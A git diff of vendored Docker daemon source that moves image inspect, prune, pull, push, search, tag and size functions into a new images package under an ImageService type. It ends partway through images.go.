diff --git a/vendor/github.com/docker/docker/daemon/image_inspect.go b/vendor/github.com/docker/docker/daemon/images/image_inspect.go
similarity index 53%
rename from vendor/github.com/docker/docker/daemon/image_inspect.go
rename to vendor/github.com/docker/docker/daemon/images/image_inspect.go
index ebf912469c..16c4c9b2dc 100644
--- a/vendor/github.com/docker/docker/daemon/image_inspect.go
+++ b/vendor/github.com/docker/docker/daemon/images/image_inspect.go
@@ -1,31 +1,35 @@
-package daemon
+package images // import "github.com/docker/docker/daemon/images"
 
 import (
-	"fmt"
 	"time"
 
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
-	"github.com/docker/docker/reference"
+	"github.com/docker/docker/pkg/system"
+	"github.com/pkg/errors"
 )
 
 // LookupImage looks up an image by name and returns it as an ImageInspect
 // structure.
-func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) {
-	img, err := daemon.GetImage(name)
+func (i *ImageService) LookupImage(name string) (*types.ImageInspect, error) {
+	img, err := i.GetImage(name)
 	if err != nil {
-		return nil, fmt.Errorf("No such image: %s", name)
+		return nil, errors.Wrapf(err, "no such image: %s", name)
 	}
-
-	refs := daemon.referenceStore.References(img.ID().Digest())
+	if !system.IsOSSupported(img.OperatingSystem()) {
+		return nil, system.ErrNotSupportedOperatingSystem
+	}
+	refs := i.referenceStore.References(img.ID().Digest())
 	repoTags := []string{}
 	repoDigests := []string{}
 	for _, ref := range refs {
 		switch ref.(type) {
 		case reference.NamedTagged:
-			repoTags = append(repoTags, ref.String())
+			repoTags = append(repoTags, reference.FamiliarString(ref))
 		case reference.Canonical:
-			repoDigests = append(repoDigests, ref.String())
+			repoDigests = append(repoDigests, reference.FamiliarString(ref))
 		}
 	}
 
@@ -33,11 +37,11 @@ func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) {
 	var layerMetadata map[string]string
 	layerID := img.RootFS.ChainID()
 	if layerID != "" {
-		l, err := daemon.layerStore.Get(layerID)
+		l, err := i.layerStores[img.OperatingSystem()].Get(layerID)
 		if err != nil {
 			return nil, err
 		}
-		defer layer.ReleaseAndLog(daemon.layerStore, l)
+		defer layer.ReleaseAndLog(i.layerStores[img.OperatingSystem()], l)
 		size, err = l.Size()
 		if err != nil {
 			return nil, err
@@ -54,6 +58,11 @@ func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) {
 		comment = img.History[len(img.History)-1].Comment
 	}
 
+	lastUpdated, err := i.imageStore.GetLastUpdated(img.ID())
+	if err != nil {
+		return nil, err
+	}
+
 	imageInspect := &types.ImageInspect{
 		ID:              img.ID().String(),
 		RepoTags:        repoTags,
@@ -67,16 +76,29 @@ func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) {
 		Author:          img.Author,
 		Config:          img.Config,
 		Architecture:    img.Architecture,
-		Os:              img.OS,
+		Os:              img.OperatingSystem(),
 		OsVersion:       img.OSVersion,
 		Size:            size,
 		VirtualSize:     size, // TODO: field unused, deprecate
 		RootFS:          rootFSToAPIType(img.RootFS),
+		Metadata: types.ImageMetadata{
+			LastTagTime: lastUpdated,
+		},
 	}
 
-	imageInspect.GraphDriver.Name = daemon.GraphDriverName()
-
+	imageInspect.GraphDriver.Name = i.layerStores[img.OperatingSystem()].DriverName()
 	imageInspect.GraphDriver.Data = layerMetadata
 
 	return imageInspect, nil
 }
+
+func rootFSToAPIType(rootfs *image.RootFS) types.RootFS {
+	var layers []string
+	for _, l := range rootfs.DiffIDs {
+		layers = append(layers, l.String())
+	}
+	return types.RootFS{
+		Type:   rootfs.Type,
+		Layers: layers,
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/images/image_prune.go b/vendor/github.com/docker/docker/daemon/images/image_prune.go
new file mode 100644
index 0000000000..313494f2f4
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/images/image_prune.go
@@ -0,0 +1,211 @@
+package images // import "github.com/docker/docker/daemon/images"
+
+import (
+	"context"
+	"fmt"
+	"sync/atomic"
+	"time"
+
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	timetypes "github.com/docker/docker/api/types/time"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/opencontainers/go-digest"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+var imagesAcceptedFilters = map[string]bool{
+	"dangling": true,
+	"label":    true,
+	"label!":   true,
+	"until":    true,
+}
+
+// errPruneRunning is returned when a prune request is received while
+// one is in progress
+var errPruneRunning = errdefs.Conflict(errors.New("a prune operation is already running"))
+
+// ImagesPrune removes unused images
+func (i *ImageService) ImagesPrune(ctx context.Context, pruneFilters filters.Args) (*types.ImagesPruneReport, error) {
+	if !atomic.CompareAndSwapInt32(&i.pruneRunning, 0, 1) {
+		return nil, errPruneRunning
+	}
+	defer atomic.StoreInt32(&i.pruneRunning, 0)
+
+	// make sure that only accepted filters have been received
+	err := pruneFilters.Validate(imagesAcceptedFilters)
+	if err != nil {
+		return nil, err
+	}
+
+	rep := &types.ImagesPruneReport{}
+
+	danglingOnly := true
+	if pruneFilters.Contains("dangling") {
+		if pruneFilters.ExactMatch("dangling", "false") || pruneFilters.ExactMatch("dangling", "0") {
+			danglingOnly = false
+		} else if !pruneFilters.ExactMatch("dangling", "true") && !pruneFilters.ExactMatch("dangling", "1") {
+			return nil, invalidFilter{"dangling", pruneFilters.Get("dangling")}
+		}
+	}
+
+	until, err := getUntilFromPruneFilters(pruneFilters)
+	if err != nil {
+		return nil, err
+	}
+
+	var allImages map[image.ID]*image.Image
+	if danglingOnly {
+		allImages = i.imageStore.Heads()
+	} else {
+		allImages = i.imageStore.Map()
+	}
+
+	// Filter intermediary images and get their unique size
+	allLayers := make(map[layer.ChainID]layer.Layer)
+	for _, ls := range i.layerStores {
+		for k, v := range ls.Map() {
+			allLayers[k] = v
+		}
+	}
+	topImages := map[image.ID]*image.Image{}
+	for id, img := range allImages {
+		select {
+		case <-ctx.Done():
+			return nil, ctx.Err()
+		default:
+			dgst := digest.Digest(id)
+			if len(i.referenceStore.References(dgst)) == 0 && len(i.imageStore.Children(id)) != 0 {
+				continue
+			}
+			if !until.IsZero() && img.Created.After(until) {
+				continue
+			}
+			if img.Config != nil && !matchLabels(pruneFilters, img.Config.Labels) {
+				continue
+			}
+			topImages[id] = img
+		}
+	}
+
+	canceled := false
+deleteImagesLoop:
+	for id := range topImages {
+		select {
+		case <-ctx.Done():
+			// we still want to calculate freed size and return the data
+			canceled = true
+			break deleteImagesLoop
+		default:
+		}
+
+		deletedImages := []types.ImageDeleteResponseItem{}
+		refs := i.referenceStore.References(id.Digest())
+		if len(refs) > 0 {
+			shouldDelete := !danglingOnly
+			if !shouldDelete {
+				hasTag := false
+				for _, ref := range refs {
+					if _, ok := ref.(reference.NamedTagged); ok {
+						hasTag = true
+						break
+					}
+				}
+
+				// Only delete if it's untagged (i.e. repo:<none>)
+				shouldDelete = !hasTag
+			}
+
+			if shouldDelete {
+				for _, ref := range refs {
+					imgDel, err := i.ImageDelete(ref.String(), false, true)
+					if imageDeleteFailed(ref.String(), err) {
+						continue
+					}
+					deletedImages = append(deletedImages, imgDel...)
+				}
+			}
+		} else {
+			hex := id.Digest().Hex()
+			imgDel, err := i.ImageDelete(hex, false, true)
+			if imageDeleteFailed(hex, err) {
+				continue
+			}
+			deletedImages = append(deletedImages, imgDel...)
+		}
+
+		rep.ImagesDeleted = append(rep.ImagesDeleted, deletedImages...)
+	}
+
+	// Compute how much space was freed
+	for _, d := range rep.ImagesDeleted {
+		if d.Deleted != "" {
+			chid := layer.ChainID(d.Deleted)
+			if l, ok := allLayers[chid]; ok {
+				diffSize, err := l.DiffSize()
+				if err != nil {
+					logrus.Warnf("failed to get layer %s size: %v", chid, err)
+					continue
+				}
+				rep.SpaceReclaimed += uint64(diffSize)
+			}
+		}
+	}
+
+	if canceled {
+		logrus.Debugf("ImagesPrune operation cancelled: %#v", *rep)
+	}
+
+	return rep, nil
+}
+
+func imageDeleteFailed(ref string, err error) bool {
+	switch {
+	case err == nil:
+		return false
+	case errdefs.IsConflict(err):
+		return true
+	default:
+		logrus.Warnf("failed to prune image %s: %v", ref, err)
+		return true
+	}
+}
+
+func matchLabels(pruneFilters filters.Args, labels map[string]string) bool {
+	if !pruneFilters.MatchKVList("label", labels) {
+		return false
+	}
+	// By default MatchKVList will return true if field (like 'label!') does not exist
+	// So we have to add additional Contains("label!") check
+	if pruneFilters.Contains("label!") {
+		if pruneFilters.MatchKVList("label!", labels) {
+			return false
+		}
+	}
+	return true
+}
+
+func getUntilFromPruneFilters(pruneFilters filters.Args) (time.Time, error) {
+	until := time.Time{}
+	if !pruneFilters.Contains("until") {
+		return until, nil
+	}
+	untilFilters := pruneFilters.Get("until")
+	if len(untilFilters) > 1 {
+		return until, fmt.Errorf("more than one until filter specified")
+	}
+	ts, err := timetypes.GetTimestamp(untilFilters[0], time.Now())
+	if err != nil {
+		return until, err
+	}
+	seconds, nanoseconds, err := timetypes.ParseTimestamps(ts, 0)
+	if err != nil {
+		return until, err
+	}
+	until = time.Unix(seconds, nanoseconds)
+	return until, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/image_pull.go b/vendor/github.com/docker/docker/daemon/images/image_pull.go
similarity index 50%
rename from vendor/github.com/docker/docker/daemon/image_pull.go
rename to vendor/github.com/docker/docker/daemon/images/image_pull.go
index 2157d15974..238c38b6b3 100644
--- a/vendor/github.com/docker/docker/daemon/image_pull.go
+++ b/vendor/github.com/docker/docker/daemon/images/image_pull.go
@@ -1,81 +1,57 @@
-package daemon
+package images // import "github.com/docker/docker/daemon/images"
 
 import (
+	"context"
 	"io"
+	"runtime"
 	"strings"
+	"time"
 
 	dist "github.com/docker/distribution"
-	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/builder"
 	"github.com/docker/docker/distribution"
 	progressutils "github.com/docker/docker/distribution/utils"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/progress"
-	"github.com/docker/docker/reference"
 	"github.com/docker/docker/registry"
-	"golang.org/x/net/context"
+	"github.com/opencontainers/go-digest"
 )
 
 // PullImage initiates a pull operation. image is the repository name to pull, and
 // tag may be either empty, or indicate a specific tag to pull.
-func (daemon *Daemon) PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error {
+func (i *ImageService) PullImage(ctx context.Context, image, tag, os string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error {
+	start := time.Now()
 	// Special case: "pull -a" may send an image name with a
 	// trailing :. This is ugly, but let's not break API
 	// compatibility.
 	image = strings.TrimSuffix(image, ":")
 
-	ref, err := reference.ParseNamed(image)
+	ref, err := reference.ParseNormalizedNamed(image)
 	if err != nil {
-		return err
+		return errdefs.InvalidParameter(err)
 	}
 
 	if tag != "" {
 		// The "tag" could actually be a digest.
 		var dgst digest.Digest
-		dgst, err = digest.ParseDigest(tag)
+		dgst, err = digest.Parse(tag)
 		if err == nil {
 			ref, err = reference.WithDigest(reference.TrimNamed(ref), dgst)
 		} else {
 			ref, err = reference.WithTag(ref, tag)
 		}
 		if err != nil {
-			return err
+			return errdefs.InvalidParameter(err)
 		}
 	}
 
-	return daemon.pullImageWithReference(ctx, ref, metaHeaders, authConfig, outStream)
-}
-
-// PullOnBuild tells Docker to pull image referenced by `name`.
-func (daemon *Daemon) PullOnBuild(ctx context.Context, name string, authConfigs map[string]types.AuthConfig, output io.Writer) (builder.Image, error) {
-	ref, err := reference.ParseNamed(name)
-	if err != nil {
-		return nil, err
-	}
-	ref = reference.WithDefaultTag(ref)
-
-	pullRegistryAuth := &types.AuthConfig{}
-	if len(authConfigs) > 0 {
-		// The request came with a full auth config file, we prefer to use that
-		repoInfo, err := daemon.RegistryService.ResolveRepository(ref)
-		if err != nil {
-			return nil, err
-		}
-
-		resolvedConfig := registry.ResolveAuthConfig(
-			authConfigs,
-			repoInfo.Index,
-		)
-		pullRegistryAuth = &resolvedConfig
-	}
-
-	if err := daemon.pullImageWithReference(ctx, ref, nil, pullRegistryAuth, output); err != nil {
-		return nil, err
-	}
-	return daemon.GetImage(name)
+	err = i.pullImageWithReference(ctx, ref, os, metaHeaders, authConfig, outStream)
+	imageActions.WithValues("pull").UpdateSince(start)
+	return err
 }
 
-func (daemon *Daemon) pullImageWithReference(ctx context.Context, ref reference.Named, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error {
+func (i *ImageService) pullImageWithReference(ctx context.Context, ref reference.Named, os string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error {
 	// Include a buffer so that slow client connections don't affect
 	// transfer performance.
 	progressChan := make(chan progress.Progress, 100)
@@ -89,19 +65,25 @@ func (daemon *Daemon) pullImageWithReference(ctx context.Context, ref reference.
 		close(writesDone)
 	}()
 
+	// Default to the host OS platform in case it hasn't been populated with an explicit value.
+	if os == "" {
+		os = runtime.GOOS
+	}
+
 	imagePullConfig := &distribution.ImagePullConfig{
 		Config: distribution.Config{
 			MetaHeaders:      metaHeaders,
 			AuthConfig:       authConfig,
 			ProgressOutput:   progress.ChanOutput(progressChan),
-			RegistryService:  daemon.RegistryService,
-			ImageEventLogger: daemon.LogImageEvent,
-			MetadataStore:    daemon.distributionMetadataStore,
-			ImageStore:       distribution.NewImageConfigStoreFromStore(daemon.imageStore),
-			ReferenceStore:   daemon.referenceStore,
+			RegistryService:  i.registryService,
+			ImageEventLogger: i.LogImageEvent,
+			MetadataStore:    i.distributionMetadataStore,
+			ImageStore:       distribution.NewImageConfigStoreFromStore(i.imageStore),
+			ReferenceStore:   i.referenceStore,
 		},
-		DownloadManager: daemon.downloadManager,
+		DownloadManager: i.downloadManager,
 		Schema2Types:    distribution.ImageTypes,
+		OS:              os,
 	}
 
 	err := distribution.Pull(ctx, ref, imagePullConfig)
@@ -111,19 +93,19 @@ func (daemon *Daemon) pullImageWithReference(ctx context.Context, ref reference.
 }
 
 // GetRepository returns a repository from the registry.
-func (daemon *Daemon) GetRepository(ctx context.Context, ref reference.NamedTagged, authConfig *types.AuthConfig) (dist.Repository, bool, error) {
+func (i *ImageService) GetRepository(ctx context.Context, ref reference.Named, authConfig *types.AuthConfig) (dist.Repository, bool, error) {
 	// get repository info
-	repoInfo, err := daemon.RegistryService.ResolveRepository(ref)
+	repoInfo, err := i.registryService.ResolveRepository(ref)
 	if err != nil {
 		return nil, false, err
 	}
 	// makes sure name is not empty or `scratch`
-	if err := distribution.ValidateRepoName(repoInfo.Name()); err != nil {
-		return nil, false, err
+	if err := distribution.ValidateRepoName(repoInfo.Name); err != nil {
+		return nil, false, errdefs.InvalidParameter(err)
 	}
 
 	// get endpoints
-	endpoints, err := daemon.RegistryService.LookupPullEndpoints(repoInfo.Hostname())
+	endpoints, err := i.registryService.LookupPullEndpoints(reference.Domain(repoInfo.Name))
 	if err != nil {
 		return nil, false, err
 	}
diff --git a/vendor/github.com/docker/docker/daemon/image_push.go b/vendor/github.com/docker/docker/daemon/images/image_push.go
similarity index 60%
rename from vendor/github.com/docker/docker/daemon/image_push.go
rename to vendor/github.com/docker/docker/daemon/images/image_push.go
index e6382c7f27..4c7be8d2e9 100644
--- a/vendor/github.com/docker/docker/daemon/image_push.go
+++ b/vendor/github.com/docker/docker/daemon/images/image_push.go
@@ -1,20 +1,22 @@
-package daemon
+package images // import "github.com/docker/docker/daemon/images"
 
 import (
+	"context"
 	"io"
+	"time"
 
 	"github.com/docker/distribution/manifest/schema2"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/distribution"
 	progressutils "github.com/docker/docker/distribution/utils"
 	"github.com/docker/docker/pkg/progress"
-	"github.com/docker/docker/reference"
-	"golang.org/x/net/context"
 )
 
 // PushImage initiates a push operation on the repository named localName.
-func (daemon *Daemon) PushImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error {
-	ref, err := reference.ParseNamed(image)
+func (i *ImageService) PushImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error {
+	start := time.Now()
+	ref, err := reference.ParseNormalizedNamed(image)
 	if err != nil {
 		return err
 	}
@@ -44,20 +46,21 @@ func (daemon *Daemon) PushImage(ctx context.Context, image, tag string, metaHead
 			MetaHeaders:      metaHeaders,
 			AuthConfig:       authConfig,
 			ProgressOutput:   progress.ChanOutput(progressChan),
-			RegistryService:  daemon.RegistryService,
-			ImageEventLogger: daemon.LogImageEvent,
-			MetadataStore:    daemon.distributionMetadataStore,
-			ImageStore:       distribution.NewImageConfigStoreFromStore(daemon.imageStore),
-			ReferenceStore:   daemon.referenceStore,
+			RegistryService:  i.registryService,
+			ImageEventLogger: i.LogImageEvent,
+			MetadataStore:    i.distributionMetadataStore,
+			ImageStore:       distribution.NewImageConfigStoreFromStore(i.imageStore),
+			ReferenceStore:   i.referenceStore,
 		},
 		ConfigMediaType: schema2.MediaTypeImageConfig,
-		LayerStore:      distribution.NewLayerProviderFromStore(daemon.layerStore),
-		TrustKey:        daemon.trustKey,
-		UploadManager:   daemon.uploadManager,
+		LayerStores:     distribution.NewLayerProvidersFromStores(i.layerStores),
+		TrustKey:        i.trustKey,
+		UploadManager:   i.uploadManager,
 	}
 
 	err = distribution.Push(ctx, ref, imagePushConfig)
 	close(progressChan)
 	<-writesDone
+	imageActions.WithValues("push").UpdateSince(start)
 	return err
 }
diff --git a/vendor/github.com/docker/docker/daemon/search.go b/vendor/github.com/docker/docker/daemon/images/image_search.go
similarity index 66%
rename from vendor/github.com/docker/docker/daemon/search.go
rename to vendor/github.com/docker/docker/daemon/images/image_search.go
index 5d2ac5d222..8b65ec709c 100644
--- a/vendor/github.com/docker/docker/daemon/search.go
+++ b/vendor/github.com/docker/docker/daemon/images/image_search.go
@@ -1,11 +1,9 @@
-package daemon
+package images // import "github.com/docker/docker/daemon/images"
 
 import (
-	"fmt"
+	"context"
 	"strconv"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	registrytypes "github.com/docker/docker/api/types/registry"
@@ -20,11 +18,14 @@ var acceptedSearchFilterTags = map[string]bool{
 
 // SearchRegistryForImages queries the registry for images matching
 // term. authConfig is used to login.
-func (daemon *Daemon) SearchRegistryForImages(ctx context.Context, filtersArgs string, term string, limit int,
+//
+// TODO: this could be implemented in a registry service instead of the image
+// service.
+func (i *ImageService) SearchRegistryForImages(ctx context.Context, filtersArgs string, term string, limit int,
 	authConfig *types.AuthConfig,
 	headers map[string][]string) (*registrytypes.SearchResults, error) {
 
-	searchFilters, err := filters.FromParam(filtersArgs)
+	searchFilters, err := filters.FromJSON(filtersArgs)
 	if err != nil {
 		return nil, err
 	}
@@ -34,26 +35,26 @@ func (daemon *Daemon) SearchRegistryForImages(ctx context.Context, filtersArgs s
 
 	var isAutomated, isOfficial bool
 	var hasStarFilter = 0
-	if searchFilters.Include("is-automated") {
+	if searchFilters.Contains("is-automated") {
 		if searchFilters.UniqueExactMatch("is-automated", "true") {
 			isAutomated = true
 		} else if !searchFilters.UniqueExactMatch("is-automated", "false") {
-			return nil, fmt.Errorf("Invalid filter 'is-automated=%s'", searchFilters.Get("is-automated"))
+			return nil, invalidFilter{"is-automated", searchFilters.Get("is-automated")}
 		}
 	}
-	if searchFilters.Include("is-official") {
+	if searchFilters.Contains("is-official") {
 		if searchFilters.UniqueExactMatch("is-official", "true") {
 			isOfficial = true
 		} else if !searchFilters.UniqueExactMatch("is-official", "false") {
-			return nil, fmt.Errorf("Invalid filter 'is-official=%s'", searchFilters.Get("is-official"))
+			return nil, invalidFilter{"is-official", searchFilters.Get("is-official")}
 		}
 	}
-	if searchFilters.Include("stars") {
+	if searchFilters.Contains("stars") {
 		hasStars := searchFilters.Get("stars")
 		for _, hasStar := range hasStars {
 			iHasStar, err := strconv.Atoi(hasStar)
 			if err != nil {
-				return nil, fmt.Errorf("Invalid filter 'stars=%s'", hasStar)
+				return nil, invalidFilter{"stars", hasStar}
 			}
 			if iHasStar > hasStarFilter {
 				hasStarFilter = iHasStar
@@ -61,24 +62,24 @@ func (daemon *Daemon) SearchRegistryForImages(ctx context.Context, filtersArgs s
 		}
 	}
 
-	unfilteredResult, err := daemon.RegistryService.Search(ctx, term, limit, authConfig, dockerversion.DockerUserAgent(ctx), headers)
+	unfilteredResult, err := i.registryService.Search(ctx, term, limit, authConfig, dockerversion.DockerUserAgent(ctx), headers)
 	if err != nil {
 		return nil, err
 	}
 
 	filteredResults := []registrytypes.SearchResult{}
 	for _, result := range unfilteredResult.Results {
-		if searchFilters.Include("is-automated") {
+		if searchFilters.Contains("is-automated") {
 			if isAutomated != result.IsAutomated {
 				continue
 			}
 		}
-		if searchFilters.Include("is-official") {
+		if searchFilters.Contains("is-official") {
 			if isOfficial != result.IsOfficial {
 				continue
 			}
 		}
-		if searchFilters.Include("stars") {
+		if searchFilters.Contains("stars") {
 			if result.StarCount < hasStarFilter {
 				continue
 			}
diff --git a/vendor/github.com/docker/docker/daemon/search_test.go b/vendor/github.com/docker/docker/daemon/images/image_search_test.go
similarity index 97%
rename from vendor/github.com/docker/docker/daemon/search_test.go
rename to vendor/github.com/docker/docker/daemon/images/image_search_test.go
index f5aa85a61e..4fef86b6f2 100644
--- a/vendor/github.com/docker/docker/daemon/search_test.go
+++ b/vendor/github.com/docker/docker/daemon/images/image_search_test.go
@@ -1,12 +1,11 @@
-package daemon
+package images // import "github.com/docker/docker/daemon/images"
 
 import (
-	"fmt"
+	"context"
+	"errors"
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 	registrytypes "github.com/docker/docker/api/types/registry"
 	"github.com/docker/docker/registry"
@@ -23,7 +22,7 @@ type FakeService struct {
 
 func (s *FakeService) Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error) {
 	if s.shouldReturnError {
-		return nil, fmt.Errorf("Search unknown error")
+		return nil, errors.New("Search unknown error")
 	}
 	return &registrytypes.SearchResults{
 		Query:      s.term,
@@ -76,8 +75,8 @@ func TestSearchRegistryForImagesErrors(t *testing.T) {
 		},
 	}
 	for index, e := range errorCases {
-		daemon := &Daemon{
-			RegistryService: &FakeService{
+		daemon := &ImageService{
+			registryService: &FakeService{
 				shouldReturnError: e.shouldReturnError,
 			},
 		}
@@ -322,8 +321,8 @@ func TestSearchRegistryForImages(t *testing.T) {
 		},
 	}
 	for index, s := range successCases {
-		daemon := &Daemon{
-			RegistryService: &FakeService{
+		daemon := &ImageService{
+			registryService: &FakeService{
 				term:    term,
 				results: s.registryResults,
 			},
diff --git a/vendor/github.com/docker/docker/daemon/images/image_tag.go b/vendor/github.com/docker/docker/daemon/images/image_tag.go
new file mode 100644
index 0000000000..4693611c3a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/images/image_tag.go
@@ -0,0 +1,41 @@
+package images // import "github.com/docker/docker/daemon/images"
+
+import (
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/image"
+)
+
+// TagImage creates the tag specified by newTag, pointing to the image named
+// imageName (alternatively, imageName can also be an image ID).
+func (i *ImageService) TagImage(imageName, repository, tag string) (string, error) {
+	img, err := i.GetImage(imageName)
+	if err != nil {
+		return "", err
+	}
+
+	newTag, err := reference.ParseNormalizedNamed(repository)
+	if err != nil {
+		return "", err
+	}
+	if tag != "" {
+		if newTag, err = reference.WithTag(reference.TrimNamed(newTag), tag); err != nil {
+			return "", err
+		}
+	}
+
+	err = i.TagImageWithReference(img.ID(), newTag)
+	return reference.FamiliarString(newTag), err
+}
+
+// TagImageWithReference adds the given reference to the image ID provided.
+func (i *ImageService) TagImageWithReference(imageID image.ID, newTag reference.Named) error {
+	if err := i.referenceStore.AddTag(newTag, imageID.Digest(), true); err != nil {
+		return err
+	}
+
+	if err := i.imageStore.SetLastUpdated(imageID); err != nil {
+		return err
+	}
+	i.LogImageEvent(imageID.String(), reference.FamiliarString(newTag), "tag")
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/images/image_unix.go b/vendor/github.com/docker/docker/daemon/images/image_unix.go
new file mode 100644
index 0000000000..3f577271a2
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/images/image_unix.go
@@ -0,0 +1,45 @@
+// +build linux freebsd
+
+package images // import "github.com/docker/docker/daemon/images"
+
+import (
+	"runtime"
+
+	"github.com/sirupsen/logrus"
+)
+
+// GetContainerLayerSize returns the real size & virtual size of the container.
+func (i *ImageService) GetContainerLayerSize(containerID string) (int64, int64) {
+	var (
+		sizeRw, sizeRootfs int64
+		err                error
+	)
+
+	// Safe to index by runtime.GOOS as Unix hosts don't support multiple
+	// container operating systems.
+	rwlayer, err := i.layerStores[runtime.GOOS].GetRWLayer(containerID)
+	if err != nil {
+		logrus.Errorf("Failed to compute size of container rootfs %v: %v", containerID, err)
+		return sizeRw, sizeRootfs
+	}
+	defer i.layerStores[runtime.GOOS].ReleaseRWLayer(rwlayer)
+
+	sizeRw, err = rwlayer.Size()
+	if err != nil {
+		logrus.Errorf("Driver %s couldn't return diff size of container %s: %s",
+			i.layerStores[runtime.GOOS].DriverName(), containerID, err)
+		// FIXME: GetSize should return an error. Not changing it now in case
+		// there is a side-effect.
+		sizeRw = -1
+	}
+
+	if parent := rwlayer.Parent(); parent != nil {
+		sizeRootfs, err = parent.Size()
+		if err != nil {
+			sizeRootfs = -1
+		} else if sizeRw != -1 {
+			sizeRootfs += sizeRw
+		}
+	}
+	return sizeRw, sizeRootfs
+}
diff --git a/vendor/github.com/docker/docker/daemon/images/image_windows.go b/vendor/github.com/docker/docker/daemon/images/image_windows.go
new file mode 100644
index 0000000000..6f4be49736
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/images/image_windows.go
@@ -0,0 +1,41 @@
+package images
+
+import (
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/system"
+	"github.com/pkg/errors"
+)
+
+// GetContainerLayerSize returns real size & virtual size
+func (i *ImageService) GetContainerLayerSize(containerID string) (int64, int64) {
+	// TODO Windows
+	return 0, 0
+}
+
+// GetLayerFolders returns the layer folders from an image RootFS
+func (i *ImageService) GetLayerFolders(img *image.Image, rwLayer layer.RWLayer) ([]string, error) {
+	folders := []string{}
+	max := len(img.RootFS.DiffIDs)
+	for index := 1; index <= max; index++ {
+		// FIXME: why does this mutate the RootFS?
+		img.RootFS.DiffIDs = img.RootFS.DiffIDs[:index]
+		if !system.IsOSSupported(img.OperatingSystem()) {
+			return nil, errors.Wrapf(system.ErrNotSupportedOperatingSystem, "cannot get layerpath for ImageID %s", img.RootFS.ChainID())
+		}
+		layerPath, err := layer.GetLayerPath(i.layerStores[img.OperatingSystem()], img.RootFS.ChainID())
+		if err != nil {
+			return nil, errors.Wrapf(err, "failed to get layer path from graphdriver %s for ImageID %s", i.layerStores[img.OperatingSystem()], img.RootFS.ChainID())
+		}
+		// Reverse order, expecting parent first
+		folders = append([]string{layerPath}, folders...)
+	}
+	if rwLayer == nil {
+		return nil, errors.New("RWLayer is unexpectedly nil")
+	}
+	m, err := rwLayer.Metadata()
+	if err != nil {
+		return nil, errors.Wrap(err, "failed to get layer metadata")
+	}
+	return append(folders, m["dir"]), nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/images.go b/vendor/github.com/docker/docker/daemon/images/images.go
similarity index 71%
rename from vendor/github.com/docker/docker/daemon/images.go
rename to vendor/github.com/docker/docker/daemon/images/images.go
index 88fb8f8e91..49212341c5 100644
--- a/vendor/github.com/docker/docker/daemon/images.go
+++ b/vendor/github.com/docker/docker/daemon/images/images.go
@@ -1,4 +1,4 @@
-package daemon
+package images // import "github.com/docker/docker/daemon/images"
 
 import (
 	"encoding/json"
@@ -14,6 +14,7 @@ import (
 	"github.com/docker/docker/container"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/system"
 )
 
 var acceptedImageFilterTags = map[string]bool{
@@ -33,8 +34,8 @@ func (r byCreated) Swap(i, j int)      { r[i], r[j] = r[j], r[i] }
 func (r byCreated) Less(i, j int) bool { return r[i].Created < r[j].Created }
 
 // Map returns a map of all images in the ImageStore
-func (daemon *Daemon) Map() map[image.ID]*image.Image {
-	return daemon.imageStore.Map()
+func (i *ImageService) Map() map[image.ID]*image.Image {
+	return i.imageStore.Map()
 }
 
 // Images returns a filtered list of images. filterArgs is a JSON-encoded set
@@ -42,7 +43,7 @@ func (daemon *Daemon) Map() map[image.ID]*image.Image {
 // filter is a shell glob string applied to repository names. The argument
 // named all controls whether all images in the graph are filtered, or just
 // the heads.
-func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs bool) ([]*types.ImageSummary, error) {
+func (i *ImageService) Images(imageFilters filters.Args, all bool, withExtraAttrs bool) ([]*types.ImageSummary, error) {
 	var (
 		allImages    map[image.ID]*image.Image
 		err          error
@@ -53,22 +54,22 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs
 		return nil, err
 	}
 
-	if imageFilters.Include("dangling") {
+	if imageFilters.Contains("dangling") {
 		if imageFilters.ExactMatch("dangling", "true") {
 			danglingOnly = true
 		} else if !imageFilters.ExactMatch("dangling", "false") {
-			return nil, fmt.Errorf("Invalid filter 'dangling=%s'", imageFilters.Get("dangling"))
